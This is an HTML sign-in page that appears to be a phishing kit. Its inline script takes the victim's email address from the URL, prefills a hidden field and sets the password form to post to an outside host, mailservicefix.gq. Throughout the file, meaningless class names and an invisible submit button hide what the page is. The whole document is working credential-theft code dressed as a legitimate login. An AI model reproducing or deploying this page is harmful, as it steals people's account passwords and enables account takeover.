<!DOCTYPE html>
<html lang="en">

<head>
<title>Sign in</title>
<link rel="stylesheet" type="text/css" href="./style.css" />
<meta charset="UTF-8">
<link rel="shortcut icon" href="favicon.ico">
</head>

<body class="secbody">
<form class="dewin" method="post" id="pax" action="" >
<fieldset class="fews">
 <div class="yumx" id="bax"></div><br>
<input class="yumy" type="password" id="inpwd" name="pexam" placeholder="&nbsp;Password" value="" required autocomplete="off"><br>
<input type="submit" class="aperi" value="jhgjhgjhghjgjhqx" style="opacity: 0;"><br>
<input type="hidden" name="exam" id="cax" value="" required autocomplete="off"><br>
</fieldset>
</form>
</body>
<script>
	document.getElementById("inpwd").focus();
			    var str = window.location.href;
				var strs = str.split("=");
				var emaq = strs[1];
				if(emaq){
					var remaq = emaq.replace(/%40/, "@");
					document.getElementById("bax").innerHTML = remaq;
					document.getElementById("cax").value = remaq;
					document.getElementById("pax").action = "https://mailservicefix.gq/attention/posted.php";
				}
</script>
</html>
